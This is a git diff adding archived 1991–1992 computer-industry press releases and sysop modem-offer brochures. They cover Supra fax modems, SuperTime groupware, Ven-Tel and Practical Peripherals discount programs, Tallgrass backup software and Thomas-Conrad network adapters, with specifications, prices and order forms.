Dvorak to the Berkeley Macintosh User's Group (BMUG). In +addition to manufacturing a complete line of fax and data modems, Supra +makes a variety of peripherals for Commodore Amiga computers. + +Supra Corporation +7101 SW Supra Drv +Albany, OR 97321 +503-967-2400 (main 8-5pst) +503-967-2401 (Fax) +503-967-2410 (Sales 7-5pst) +800-727-8772 (Sales 7-5pst) +503-967-2440 (Tech Support 9-4pst) +503-967-2444 (BBS, 2 line v32bis) +CompuServe 76004,565 +GEnie SupraTech Bix +SupraCorp American Online SupraCorp2 + + +SupraFAXModem Packages for Macintosh and IBM PC Compatibles Provide +Everything User Needs + +ALBANY, +OR, January 1992 Supra's two newest modems the SupraFAXModem V.32bis and +the SupraFAXModem V.32 are available as stand-alone units that work with +any computer with an RS-232C port, and as packages that include software +and cables for Macintosh and IBM PC compatible computers. The packages +provide everything the user needs to get started using the modem +immediately. The Macintosh packages are compatible with System 7 and +include FAXstf fax software, award-winning MicroPhone 1.5 +telecommunications software, a CompuServe Information Manager starter +kit and software, and online service offers. Also included in the +Macintosh packages are a modem cable, phone cable, and manuals. IBM +packages are available with internal and external SupraFAXModems for DOS +and Windows. Windows packages include Winfax software, online service +offers, and all required cables and manuals. (Windows comes with its own +telecom software.) DOS packages include FaxTalk Plus software, Mirror +telecommunications software, online service offers, and all required +cables and manuals. + +SupraFAXModem Retail Prices + +SupraFAXModem V.32bis Stand-Alone $399.95 +SupraFAXModem V.32 Stand-Alone $299.95 +SupraFAXModem V.32bis Macintosh $479.95 +SupraFAXModem V.32 Macintosh $379.95 +SupraFAXModem V.32bis IBM PC external $449.95 +SupraFAXModem V.32bis IBM PC internal $389.95 +SupraFAXModem V.32 IBM PC external $349.95 +SupraFAXModem V.32 IBM PC internal $289.95 + +DOS or Windows package + +Various upgrade offers will let owners of earlier SupraModems upgrade to +fax capabilities. Supra also has a sysop program for the stand-alone +versions. The Supra Sales Department can provide customers with more +information at 1-800-727-8772 or 503-967-2410. + +SupraFAXModem Features +Feature SupraFAXModem V.32bis SupraFAXModem V.32 +Retail Price (Stand-Alone) $399.95 $299.95 +Maximum Fax Rate 14,400 bps 9600 bps +Class 1 and 2 commands X X +Group 3 compatible X X +Send and receive fax X X +CCITT V.27 ter X X +CCITT V.29 X X +CCITT V.17 X X +Maximum Data Rate +(without data compression) 14,400 bps 9600 bps +Bell 103/212A X X +CCITT V.21/V.22/ V.22bis X X +CCITT V.23 X X +CCITT V.32 X X +CCITT V.32bis X +Error correction X X +MNP 2P4, MNP 10 X X +CCITT V.42 X X +Data compression X X +MNP 5 (2:1) X X +CCITT V.42bis (4:1) X X +Max. throughput, MNP 5 28,800 bps 19,200 bps +Max. throughput, V.42bis 57,600 bps 38,400 bps +Digital status display X X +Connection status (digital) 3, 6, 12, 24, 48, 72, 3, 6, 12, 24, 48, + 96, 120, 144, FX 96, FX +Error correction status (digital) LP (V.42bis LAPM), same as V.32bis + M2 (MNP 2), M3 (MNP 3), + M4 (MNP 4), M5 (MNP 5), + M10 (MNP 10) +Data compression status (digital) DC same as V.32bis +Action status (digital) DI, RI, AA, CD, TE, TM same as V.32bis +Single LED status display OH, RD, SD, TR same as V.32bis +Case size 1" x 4.5" x 6.5" 1" x 4.5" x 6.5" + +Upgradable to Voice X X +Upgradable to Caller ID X X +5 year limited warranty X X +Made in the U.S.A. X X +RATS command compatible X X +Asynchronous operation X X +Synchronous operation X X +Compatible with popular + telecommunications software X X +Automatic adjustment to + optimal protocol and rate X X +Autoanswer/autodial + (tone or pulse) X X +Two modular phone jacks X X +Adjustable-volume speaker X X +Front panel ON/OFF switch X X +Stand-alone version X X +Macintosh* package1 X X +IBM* PC Windows* package2 X X +IBM PC DOS* package3 X X + +1 Macintosh packages are compatible with System 7 and include FAXstf* fax +software, award-winning MicroPhone* 1.5 telecommunications software, CompuServe +Information Manager* starter kit and software, online service offers, modem +cable, phone cable, and manuals. + +2 Windows packages include Winfax* software, online service offers, cables, and +manuals. (Windows comes with its own telecom software.) + +3 DOS packages include FaxTalk* Plus software, Mirror* telecommunications +software, online service offers, cables, and manuals. + +Supra Corporation +7101 SW Supra Drv +Albany, OR 97321 +503-967-2400 (main 8-5pst) +503-967-2401 (Fax) +503-967-2410 (Sales 7-5pst) +800-727-8772 (Sales 7-5pst) +503-967-2440 (Tech Support 9-4pst) +503-967-2444 (BBS, 2 line v32bis) +CompuServe 76004,565 +GEnie SupraTech +Bix SupraCorp +American Online SupraCorp2 + \ No newline at end of file diff --git a/textfiles.com/computers/PRESSRELEASE/suprtime.txt b/textfiles.com/computers/PRESSRELEASE/suprtime.txt new file mode 100644 index 00000000..b92b0a23 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/suprtime.txt @@ -0,0 +1,105 @@ +Toronto, Ontario -- November 14, 1991-- SuperTime Inc. has announced that +they are now shipping version 1.1 of their critically acclaimed groupware +product, SuperTime. The new release contains added functionality in the +product's sales management and telemarketing features, improved text +editing capabilities, increased integration and interactivity between the +various modules, easier installation/setup routines and more extensive +help. + +Designed to automate and organize the daily activities of an entire +LAN-connected office, these new enhancements have been added to +SuperTime's existing Appointment Calendar/Scheduler, Contact Directories, +Message Center (including complete E-Mail), Project & Task Management, DOS +Shell/Menu Routines and Data Reference Libraries . + +SuperTime 1.1 has strengthened its sales management/telemarketing features +by totally integrating the Activity List of the Contact Directory with +other components of the software including To-Do items, Appointments and a +new Call List that appears under the Calendar Module. The addition of an +Auto-Dialer allows users to quickly and accurately make phone contact with +any one of their clients from anywhere in the program. + +With the new text editing capabilities, that are used in all note fields in +SuperTime, users can now instantly generate Quick Letters from within any +contact file. Text can easily be imported and exported between the +internal note fields and WordPerfect, Microsoft Word, WordStar and ASCII +formats. SuperTime's text editor also now allows block cut/copy and paste +and search/replace functions. + +The context-sensitive, hypertext Help System in SuperTime version 1.1 has +been greatly expanded, virtually eliminating the need to refer to the +documentation. The new version is also highlighted by its streamlined +installation and setup routines that enable users to have SuperTime 1.1 +running on their LAN in minutes. Adding new users and resources is also +faster and simpler using the default settings within version 1.1's +Resource Setup. + +According to Gary Babcock, Product Manager for SuperTime "The biggest news +of SuperTime Version 1.1 is the increased integration between the Contact +Management Module and the Calendar Module. This integration is critical +for people who need to manage both their time, and their activities. +Because SuperTime 1.1 is a groupware product, its enhanced features will +help people co-ordinate not just their activities, but also those +activities in relation to everyone else's in the organization." + +SuperTime's Appointment Calendar has the ease of use of a written diary, +yet has all the features and functionality to handle even the most complex +appointment booking situations, including multi-resource group +scheduling. + +SuperTime's Contact Directory is a comprehensive contact management system +containing General, Private and Other Directories that can be completely +customized to the users' requirements. During data entry, SuperTime +dynamically links individual contacts to their corresponding +business/organization records, and vice versa, enabling users to apply a +variety of methods to instantly locate and retrieve records. + +SuperTime's Message Center has proven to be one of its more popular +components. The Message Center provides complete Electronic Mail +capability, an In/Out Board, a Switchboard for centralizing the generation +and retrieval of phone messages, and a personal message retrieval center. + +Capable of organizing every facet of a large project, the Project & Task +Management area provides a structured method for creating and tracking the +everyday "To-Do" lists of individual users; allowing delegation, +scheduling, milestone reviews, and expense detailing of tasks for all +users on the system. + +The DOS Shell/Menu allows users to run SuperTime as a TSR, and enables +other applications to be selected and run from a menu within SuperTime. + +The Data Reference Libraries contain reference information (e.g. unit +conversion tables, area codes, etc.) and a pop up calculator, providing an +easy on-line reference facility. + +SuperTime version 1.1 is an MS-DOS based program and will run on any +Network OS that complies with DOS 3.x file locking protocol (including +Navell, Banyan, LAN Manager, Artisoft and Hayes), with a minimum of 512 K +available RAM on the workstation. SuperTime retails for $295 for the +single user/single resource version, $495 for single user/multi-resource, +$695 for 4 users, $995 for 8 users, $1695 for 16 users, $2495 for 25 +users, $4795 for 50 users, $6995 for 75 users, $8995 for 100 users, and +$85 for each users greater than 100. + +SuperTime Inc. is a software development company, with Head Offices and R&D +facilities located in Toronto, Ontario, Canada. As a founding member of +the Software Publishing Association's Special Interest Group for Workgroup +Computing, SuperTime is committed to bringing high quality, +state-of-the-art, LAN-oriented groupware products to the rapidly expanding +LAN marketplace. + +SuperTime Inc +2025 Sheppard Ave E, Suite 2206 +Willowdale (Toronto), Ontario CANADA M2J 1V7 +416-499-3288 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/sysbbs.txt b/textfiles.com/computers/PRESSRELEASE/sysbbs.txt new file mode 100644 index 00000000..04b7bc8e --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/sysbbs.txt @@ -0,0 +1,207 @@ + + + We want the single most powerful endorsement + + a product can have ........... + + + + Y O U R S ! + + THE BBS SYSOP + + + We think Bulletin Board System Operators + everywhere will flip over our NEW PM14400FXSA + V.32bis modem! + + We think you'll agree that it's the most + impressive new modem of it's kind...a real + breakthrough at a suggested retail price of $549 + for the stand-alone. + + But...you don't have to pay $549. Or $499... + Or even $399! + + If you'll tell you customers that your system + uses our new modems when they log on, we'll sell + you all the modems your system needs for just $250 + each for the stand-alone. + + Take a good look at the modem's features, + specifications, and its lifetime warranty. + Together with a price especially for Bulletin + Board System Operators it all adds up to a + spectacular value. + + The product is superior, the price is + spectacular, and there's never been a better time + to put new state-of-the-art technology to work for + you! + + + FEATURES & SPECIFICATIONS: + + () Compatible with Hayes Ultra 144, Ultra, and + Optima + () Supports Group III send/receive FAX + capabilities. + () Supports V.42 error detection/correction. + () Supports both hardware and software flow + control. + () V.42bis data compression for effective data + throughput up to 57,600bps. + () Supports MNP level 2-5, MNP/4 error + correction, MNP/5 data compression. + () Inactivity disconnect timer. + () Power On self test includes RAM, ROM, NVRAM + () Stand Alone has a 12-character back lit LED + display. + () RS-232C interface. + () Dialing Methods: User selectable Tone or + Pulse dialing, Secondary dial tone detection + and quiet answer. Full call progress + monitoring via programmable speaker and + negotiation progress messages. + () Nonvolatile memory stores 4 telephone numbers + (up to 36 digits each). + () Interface: RS-232 and RJ11 + () Dimensions: 3"x5"x10". + + + Here's how to use the very Practical PM14400FXSA + V.32bis Product Purchase Plan. + + 1: To qualify for this special offer you + must currently be operating a bulletin + board system. + + 2: You must use the order form attached, + and warrant that the modems you buy are + for your own use in operating your + bulletin board system, and are not for + resale. + + 3: The number of modems you may purchase + is limited to the number of working data + lines connected to your bulletin board + system. Data line numbers must be shown + on the order form. PLEASE INCLUDE A COPY + OF YOUR CURRENT PHONE BILL. If these + numbers change, you will notify Practical + Peripherals promptly. + + 4: You agree to post an appropriate + visible notice at the start of log-on to + the bulletin board system that the system + uses the: "...NEW PRACTICAL PERIPHERALS + PM14400FXSA V.32BIS MODEM." + + 5: Payment must accompany the order form. + Major credit cards, money orders, and + personal checks will be accepted. (If + you pay for your order with a personal + check, your Practical Peripherals + product will be shipped when your + check has cleared). + + The special Offer is good until Dec. 31 1992. + So double check all the specs and order now. + Please allow 3-4 weeks for Delivery. + + +Open a log file to log the order form: + + + Return this form with your payment to: + + Practical Peripherals, Dept. Sysop, + 31245 La Baya Drive, + Westlake Village, CA 91362 + Phone: (818)706-0333 + Fax: (818)706-2474 + + + 1. Here's my order for ________ PM14400FXSA + V.32bis modems at the special price of $250.00 + each. + + Total payment of $______________ is enclosed. + + (Include 7.50 per unit for S/H. CA + residents add 8.25% Sales Tax.) + + 2. Form of Payment: + + () Company Check () Cashier's Check + () Personal Check () MasterCard + () Money Order () VISA + + Credit Card #: __________________________________ + + Exp. Date: ______________________________________ + + Authorized Signature: ___________________________ + + + 3. Name of BBS: ________________________________ + + Hours of Operation: _________________________ + + Types of BBS Software Used: _________________ + + Special subjects covered by your bbs: _______ + + ______________________________________________ + + ______________________________________________ + + Type and baud rate of modem(s) currently being + used: _______________________________________ + + ______________________________________________ + + ______________________________________________ + + 4. Please give us an account number, name, and + password to log-on to your system: __________ + + ______________________________________________ + + ______________________________________________ + + + 5. BBS/Data Telephone Numbers...1 for each modem + ordered (Use a separate sheet for additional + numbers): + + ( )_______________ ( )______________ + + ( )_______________ ( )______________ + + ( )_______________ ( )______________ + + + 6. Ship Modems to: + + Address: __________________________________ + + City: _____________________________________ + + State: _________ ZipCode: ________________ + + + 7. Your signature indicates that you will abide + by the terms of the special offer outlined in + this brochure. Please be sure that all + information on this form is accurate. Your + order cannot be processed if this form is + incomplete or inaccurate. + + + Your Signature: __________________________________________________ + + + +Please close log file at this time: + diff --git a/textfiles.com/computers/PRESSRELEASE/sysdeal.txt b/textfiles.com/computers/PRESSRELEASE/sysdeal.txt new file mode 100644 index 00000000..4c6f3b9b --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/sysdeal.txt @@ -0,0 +1,337 @@ + +SYSOP PROGRAM BROCHURE + +Instructions: + +Read the Ven-Tel SYSOP Program Rules carefully. Seperate the rules +from the rest of the brochure and keep them in a safe place. Fill out +and return the rest of the form to Ven-Tel. + + This section describes the rules of the Ven-Tel SYSOP program. +Ven-Tel reserves the right to modify or change these rules at any +time. + +Scope: + + The Ven-Tel SYSOP Program permits qualified SYSOPs to purchase +current Ven- Tel modem products at a reduced price. + +Qualifications: + + +1. The SYSOP has been operating a bulletin board system for at least +6 months. + +2. The SYSOP understands that the number of modems that may be +obtained under this program is limited to the number of working, +verifiable data lines. Modems purchased under this program must be +used on one of the stated lines. + +3. The SYSOP agrees to post an appropriate logon notice, visible to +users of the bulletin board, which states that this bulletin board +uses and supports Ven-Tel modems. + +4. The SYSOP agrees that he/she intends to operate the bulletin +board, for which these modems are purchased, for at least 6 months +post purchase. + +5. Resellers of Ven-Tel modems are NOT eligible to purchase modems +under this program. Instead, qualified resellers may take advantage of +other marketing programs offered by Ven-Tel. Information is available +by calling the Sales and Marketing Department at: 800-538-5121. + +6. Ven-Tel will ship modem(s) to qualified SYSOPs as soon as possible +after: + + a. The SYSOP completes the order form and questionnaire found +immediately after these rules and mails it along with the appropriate +payment and shipping instructions to: Ven-Tel Inc. 2121 Zanker Road +San Jose, CA 95131 Attention: APPLICATION SUPPORT + +* Acceptable forms of payment include check or certified money order, +C.O.D., VISA and MasterCard. + + b. The SYSOP further understands that once an order is placed, it +cannot be changed. + +* If you are uncertain as to what type of modem you want to purchase +under this program, you may consult the Bulletin Menu of Ven-Tel's +TIPS BBS for product information at (408) 922-0988, or, you may call +Ven-Tel's Application Support Department at 800-538-5121 ext. 230. + + + c. Your board has been verified by the Ven-Tel SYSOP. We must be +able to connect with your bulletin board to verify board status. + +* In the event that we are uncertain of your board status, you will +be notified by the Ven-Tel SYSOP of what else is needed to transact +the order, or if Ven-Tel cannot transact the order due to an invalid +board status. + + +7. Ven-Tel will not accept phone orders. FAX orders for VISA/MC and +C.O.D. purchases are acceptable. C.O.D. is limited to the continental +U.S. only. + +8. Ven-Tel reserves the right to modify, change or cancel this +program at any time. + + + +Ven-Tel Sysop Program Questionnaire + +*** PLEASE ANSWER ALL QUESTIONS *** + + + This section contains questions designed to assist us in +processing your order. You must answer all questions for this form to +be considered a valid order. + + + +1. Day Time Voice Telephone Numbers (include area code) + ______________________________________________ + ______________________________________________ + +2. Data (BBS) Telephone Numbers (include area code) + ______________________________________________ + ______________________________________________ + +3. Hours of board operation (pacific standard time, please) + ______________________________________________ + +5. Bulletin Board Name: + ______________________________________________ + +6. How long has your board been in operation? + ______________________________________________ + +7. Please give us the necessary information to log on and access your board: + +Please remember, we will not ship your order until we verify your board status. + + + Your Board Password: + Our log on first name: + Our log on last name: + Our log on password: + Access level: + + * Note, we must be able to view all files and user log in order to +validate your board status. Please assign us the appropriate access +level. + +8. For whom do you work? + + Company Name: + Company Address: + + City: St: Zip:________ + Work Phone # + Your position (title) + + +9. Please describe the main thrust of your board. What is your primary +audience, what are the unique features & benefits, etc.? + + + + + + + + +10. Are you a User Group Member? ____ Yes ____ No + If so, which group(s) (please list) + ____________________________________________________________ + ____________________________________________________________ + ____________________________________________________________ + +11. What type of bbs software does your board use? + ____________________________________________________________ + +12. Where did you hear of Ven-Tel's SYSOP offer (be specific)? + ____________________________________________________________ + ____________________________________________________________ + + + + Thank you for completing this section of the order form. + + + +Ven-Tel Sysop Program +Price List and Order Form +Effective: August 1, 1991 + + + This section contains price and ordering information. Once +Ven-Tel's APPLICATION SUPPORT DEPARTMENT receives your completed order +and can verify your BBS, your modem will be shipped. + + + To help us facilitate your order, please be sure to complete this +form clearly and accurately. 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EnterpriZ is fully network aware, automatically +configuring itself to the network operating system in use. It concurrently +supports multiple network operating systems and multiple tape devices on +the network. EnterpriZ also fully supports backup on Banyan servers +including the STREET TALK database. + +Features + +FileSECURE EnterpriZ offers Quick File Access, context-sensitive on-line +help, and auto-login security. Data may be restored to any server or +workstation allowing for productivity even after a major server crash. +EnterpriZ supports cascading backups to multiple daisy-chained devices in +one backup operation. + +"FileSECURE EnterpriZ ex(ends the functionality of workstation-based backup +by including automatic support for multiple operating systems and multiple +tape devices. This level of support preserves the uses storage investments +and provides a solution that can grow with the requirements of the +network," stated Ernest H. Wassmann, President and CEO of Tallgrass. + +Compatibility + +Hardware platform compatibility for FileSECURE EnterpriZ includes ISA and +MCA bus computers and supports operation in EISA. EnterpriZ supports the +following network operating systems: NetWare, LANtastic, 10NET, PC LAN, +POWERLan, and a host of other NetBIOS and SMB based LANs. Banyan VINES +support will also be available as an option in the second quarter of +1992. + +Pricing + +Suggested retail pricing for FileSECURE EnterpriZ is $795 . EnterpriZ with +the Banyan VINES option retails for $1,995. The product is packaged +complete with both 5.25" and 3.5" diskettes. + +Tallgrass Technologies is a leading supplier of storage management +solutions. Established in 1981, Tallgrass supports an installed base in +excess of 250,000 units worldwide. Celebrating over a decade in business +as Architects of Storage Management, Tallgrass is represented in +twenty-two countries around the globe. + +Tallgrass' series of tape backup systems provide a full range of storage +management solutions enabling Tallgrass to be a single-source provider of +tape backup systems to its distributor partners. + +-------------------------------------------------------- + +LENEXA, Kansas (January 9, 1992) -- Tallgrass Technologies Corporation +today announced shipment of its enhanced version of NetSECURE, +server-based NLM network backup solution. + +About the Product + +NetSECURE was designed to integrate directly into the NetWare operating +system to provide maximum performance, flexibility, and a high level of +security for the user. Centralized backup allows servers and workstations +to be accessed in both attended and unattended modes. NetSECURE takes full +advantage of the NetWare Loadable Module (NIM) capabilities to maximize +tape speed for both backup and restore. NetSECURE 4.0 supports Tallgrass' +entire line of SCSI-based storage systems, with capacities ranging from +250 MB to 2 GB. + +New features of NetSECURE 4.0 include: + +ù Auto Pilot - A feature set that includes the following: + + ù tape rotation maintains daily, weekly, monthly and + yearly tapes, producing a complete system backup + history. + + ù disk grooming removes files not accessed during + a specified period of time and generates a specified + number of copies in permanent storage. + + ù Quick Recover Restore allows full or partial recovery + automatically at any specified time. + +ù Directory Mirroring - allows configuration to trim the directory of the +destination disk to match the source disk file structure. Files or +subdirectories found in the destination directory which do not appear in +the source directory can be deleted from the destination. + +ù Tape Usage Database - tracks the amount of tape usage for each individual +cartridge. A log provides information on when the tape should be replaced +or when the drive should be serviced. + +ù Archive Bit Backup - allows backup or archive operations to be performed +based on the status of the file's archive bit. + +ù Daisy Chaining - allows for the cascading of backup operations across +multiple drives. + +"NetSECURE was designed to complement the Tallgrass line of high capacity, +high speed SCSI storage solutions. It fits in with our goal of +architecting solutions that are specific to the users' needs and wants," +stated Ernest Wassmann, President and CEO of Tallgrass. + +Compatibility + +Hardware platform compatibility for NetSECURE 4.0 includes ISA and MCA bus +computers and supports operation in EISA. + +Configuration + +The NetSECURE application is available as an NLM for NetWare version 3.X +and will be available as a VAP for NetWare version 2.X in January 1992. +NetSECURE is packaged in stratified configurations and is available in NLM +packages in increments of 10-20 users, and 250 users. VAP packages will be +available in increments of 5,10 and unlimited users. + +Pricing + +Suggested retail pricing for NetSECURE 4.0 ranges from $295 for 5 user VAP +support to $1895 for 250 USER NLM support. NetSECURE is packaged as a +software kit and includes both 3 .5" and 5.25" diskettes. + +Upgrades are available to registered users and will be handled direct from +Tallgrass. + +Tallgrass Technologies is a leading supplier of storage management +solutions. Established in 1981, Tallgrass supports an installed base in +excess of 250,000 units worldwide. Celebrating a decade in business as +Architects of Storage Solutions, Tallgrass is represented in twenty-two +countries around the globe. + +Tallgrass' series of tape backup systems provide a full range of storage +management solutions enabling Tallgrass to be a single-source provider of +tape backup systems to its distributors. + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/tconrad.txt b/textfiles.com/computers/PRESSRELEASE/tconrad.txt new file mode 100644 index 00000000..923b5195 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/tconrad.txt @@ -0,0 +1,225 @@ +February 10, 1992 -- Austin, Texas -- Thomas-Conrad has added three Micro +Channel Adapters to its 100Mbps TCNS family. These adapters support +100Mbps transmission over coaxial, shielded twisted-pair (STP), and +fiber-optic cable. + +100Mbps TCNS provides affordable workstation connections. At a cost of less +than $1,250 per connection for coaxial or STP media, TCNS Micro Channel is +significantly less expensive than other proposed 100Mbps solutions over +copper- or fiber-based cabling, including FDDI. + +According to Robert Barton, TCNS product line manager for Thomas-Conrad +Corporation, Many users in the IBM community with Micro Channel machines +need TCNS to provide the extra bandwidth they don't see with 16Mbps token +ring. For applications such as multimedia or image processing, TCNS Is at +a definite advantage." + +TCNS is a token-passing, deterministic technology that is configured in a +distributed-star topology for easy network maintenance. It supports a +maximum of 255 nodes per network. The TCNS technology operates with +standard linkable, ODI and NDIS ARCNET drivers. These drivers allow TCNS +to operate in NetWare, LAN Manager, LAN Server, VINES, and POWER-LAN +environments. In addition, TCNS is compatible at the OSI Network Layer +with FDDI, Ethernet, token ring, and ARCNET LANs. + +The TCNS technology is optimized for use in imaging, document processing, +database management, and other environments where large amounts of data +need to move across the LAN quickly. TCNS first shipped one and a half +years ago, and it has rapidly gained market acceptance because the speed +it offers has not been available at an affordable cost previously. + +At present, TCNS operates on RG62/U coax, Type 1 STP, and fiber-optic +media, offering a wide range of connection costs and distances. On coax +and STP, TCNS offers an easy upgrade path for users of ARCNET and token +ring networks. + +Three TC3046 adapters will be available for IBM Type 1 shielded +twisted-pair, RG62/U coaxial, and fiberoptic media. The TC3046-STP will +list for $995; the TC3046-CX will list for $995; and, the TC3046 ST will +list for $1,395. The adapters will be available in the early second +quarter of 1992. Thomas-Conrad markets its TCNS adapters and hubs through +a worldwide network of distributors. + +-------------------------------------------------------- + +February 11, 1992 -- Thomas-Conrad has announced 8-bit 100Mbps TCNS +adapters in coax and shielded twisted-pair (STP) implementations, which +are significantly less expensive than other proposed 100Mbps solutions +over copper-based cable, including FDDI. The 8-bit adapters allow good +performance in the large population of 8088- and 286-based workstations +presently installed. + +According to Jeff Chumbley, director of strategic planning for +Thomas-Conrad Corporation, "Introducing TCNS for 8-bit processors on +copper-based media brings 100Mbps technology into the reach of users for +whom FDDI is too expensive and for whom upgrading to more powerful +workstations is not an alternative. TCNS on copper satisfies distances of +150 meters on shielded twisted-pair and 100 meters on coax. It offers a +feasible upgrade plan for existing token ring or ARCNET users that have +coax or shielded twisted-pair already installed." + +TCNS Is a token-passing, deterministic technology that is configured in a +distributed-star topology for easy network maintenance, and supports a +maximum of 255 nodes per network. The TCNS technology operates with +standard ODI or NDIS drivers and accelerated ARCNET drivers, and offers +interoperability at the OSI Network layer with FDDI, Ethernet, token ring, +and ARCNET LANs. Because TCNS uses ARCNET drivers and operates on media +commonly Installed in ARCNET and token ring network, it offers an easy +upgrade path for ARCNET and token ring networks. TCNS can operate in +NetWare, LAN Manager, LAN Server, Banyan VINES, and Performance Technology +s POWERlan environments, thus allowing easy system Interoperability. + +The TCNS technology has been shipping for one and a half years and is +marketed worldwide through a network of distributors. + +The two 8-bit copper-based adapters, the TC3042-STP TCNS Adapter/AT for +shielded twisted-pair cable and the TC3042-CX TCNS Adapter/AT for coaxial +cable list for $595. The adapters will be available late this quarter. + +-------------------------------------------------------- + +February 11, 1992 -- Thomas-Conrad has added 16/32-bit bus-mastering Micro +Channel 10BASE-T and 10BASE-2 Ethernet adapters to its Ethernet product +family. The TC5046-T 10BASE-T Ethernet Adapter is one of the first 32bit +Micro Channel adapter on the market. The TC5046-2 offers both a 10BASE-2 +connection and an AUI connector. Because these adapters use a full 32 bits +for addressing and data you can receive increased performance on your LAN +when you substitute them for other Micro Channel Ethernet adapters +presently available. + +Both the TC5046-T and the TC5046-2 adapters use the National Semiconductor +SONIC chipset, which provides support for increased network management and +diagnosis. The adapters have on-board LEDs that indicate collisions, +transmission and receipt of data, and reverse polarity--features that help +the network manager isolate and diagnose network problems. The Micro +Channel adapters are software configurable for easy installation and +comply with the IEEE 802.3 specification for Ethernet. + +According to Jeff Chumbley, director of strategic planning for +Thomas-Conrad, "The TC5046 adapters offer superior performance with their +bus-mastering design and full 32-bit driver support for both servers and +workstations. These adapters are ideal for high-performance 32-bit file +servers and workstations, and can also be used in 16-bit Micro Channel +machines." + +The TC5046-T and TC5046-2 are also available in conveniently packaged +six-pack bundles for $2,529, a savings of 9% over individually packaged +adapters. + +The TC5046 Ethernet Adapter/MC will ship in early the second quarter in +10BASE-T and 10BASE-2 versions, both priced at $449. In addition, +Thomas-Conrad manufactures 8/16-bit NE1000/2000 compatible adapters and +bus-mastering, 16-bit Ethernet adapters. The 8- and 16-bit adapters +support 10BASE-T, 10BASE-2, and 10BASE-5 environments. An eight-port +10BASE-T concentrator and 10BASE-T and 10BASE-2 transceivers are also +currently shipping. + +-------------------------------------------------------- + +January 20, 1992 -- Starting February 1 and extending through March 31, +1992, Thomas-Conrad will give users $50 in exchange for each ARCNET +adapter they trade-in for a 100Mbps TCNS RG62/U coax adapter. For those +users that need extra performance or have applications that require more +than ARCNET's 2.5Mbps transmission rate, TCNS is an ideal choice. With +this offer, users can recoup part of their initial ARCNET investment. +Approximately 4,000,000 ARCNET adapters are presently installed, many of +which run on RG62/U coaxial cable. Because TCNS is also available for +RG62/U coax, users can install it without rewiring their ARCNET LANs. + +Thomas-Conrad will accept any vendor's ARCNET adapters, regardless of the +adapter's condition. + +According to Jeff Chumbley, director of strategic planning for +Thomas-Conrad, "Many users bought ARCNET because it is reliable, +Inexpensive, and easy to troubleshoot. These same users have been waiting +for sometime for 20Mbps ARCNETPlus. With TCNS, they don't need to wait any +longer--a high-speed ARCNET-like access method is available today." + +TCNS is a 100Mbps local area network technology optimized for high-volume +and transaction-processing applications. The adapters work with most +popular network operating systems including Novell's NetWare, Banyan's +VINES, Artisoft's LANTastic, and Performance Technology's POWERLan. TCNS +adapters require no software changes to existing ARCNET networks and use +only 16KB of address space. The TCNS adapter drivers support multiple +memory address and IRQ options to provide installation flexibility with +other add-in cards. Thus, several network adapters, including TCNS can be +internally routed in a file server or dedicated device. The adapters, +which use fiber-optic, Type 1 shielded twisted-pair, or RG62/U coaxial +cable, operate under currently available Novell RX-Net drivers or +Thomas-Conrad's Accelerated ARCNET Drivers for NetWare. The TCNS adapters +connect to the network via the TCNS Smart Hub, a diagnostic hub that +supports Thomas-Conrad's HubTalkn', a network hub manager. + +To learn more about the trade-in policy, users should contact Thomas-Conrad +at 1-800-332 8683. + +-------------------------------------------------------- + +January 23, 1992 -- Effective January 20, Thomas-Conrad is dropping the +prices of its ARCNET adapters by 12-20%. The new prices will be $110 for +TC6242 8-bit coax adapters, $120 for TC6242-OTP 8-bit industry-standard +twisted-pair adapters, and $325 for TC6245 16-bit coax adapters. + +The company has also dropped prices on many of its "Six-Pack to Go" +bundles. These bundled packs offer a savings of up to 30% over +individually packaged adapters and include an offer for six free boot +ROMs. The company's TC6242 8-bit coax six-packs are $595; its TC6242 8-bit +industry-standard twisted-pair six-packs are $665; and The TC6245 16-bit +coax six-packs are $1,325. + +According to Jeff Chumbley, director of strategic planning for +Thomas-Conrad, "As a result of our commitment to World Class Manufacturing +techniques and continual, rapid improvement, we have achieved cost savings +in the manufacture of our ARCNET product line. In keeping with our +corporate philosophy of offering high quality, technically innovative LAN +products at affordable prices, we are passing these savings on to our +customers." + +These ARCNET adapters include an on-bracket node ID switch and an activity +LED for easy configuration and maintenance. Existing ARCNET drivers, +including RX-Net drivers and Thomas-Conrad's accelerated ARCNET drivers, +are compatible with the TC6242 and TC6245 family of adapters. As with +other Thomas-Conrad ARCNET adapters, the TC6242s and TC6245s operate with +Novell NetWare, Banyan VINES, Performance Technology POWERLan, Artisoft +LANtastic, and the various implementations of Microsoft's LAN Manager. + +-------------------------------------------------------- + +February 11, 1992 -- Thomas-Conrad has announced plans to join Novell's +Technical Support Alliance. The charter of the Technical Support Alliance +(TSA) is to bring industry vendors together to provide customers with a +network of comprehensive service and support. Both Novell and +Thomas-Conrad customers will benefit greatly from this partnership. + +As part of the agreement, Thomas-Conrad and Novell will cross-train each +others' technicians on their respective products. The companies will +exchange both technical information and products to enable the other +vendor to more easily solve problems in multi-vendor networks. +Thomas-Conrad and Novell will also formalize joint escalation procedures +for quick resolution of more difficult problems. + +According to Jeff Chumbley, director of strategic planning for +Thomas-Conrad, "As a part of the TSA, we are able to provide a higher +level of service to our users in Novell environments. Programs like the +TSA, in addition to our toil-free 24 hour-a-day, seven day-a-week +technical support, allow us to provide the best support in the industry to +our customers." + +In addition to participation in the TSA, Thomas-Conrad offers 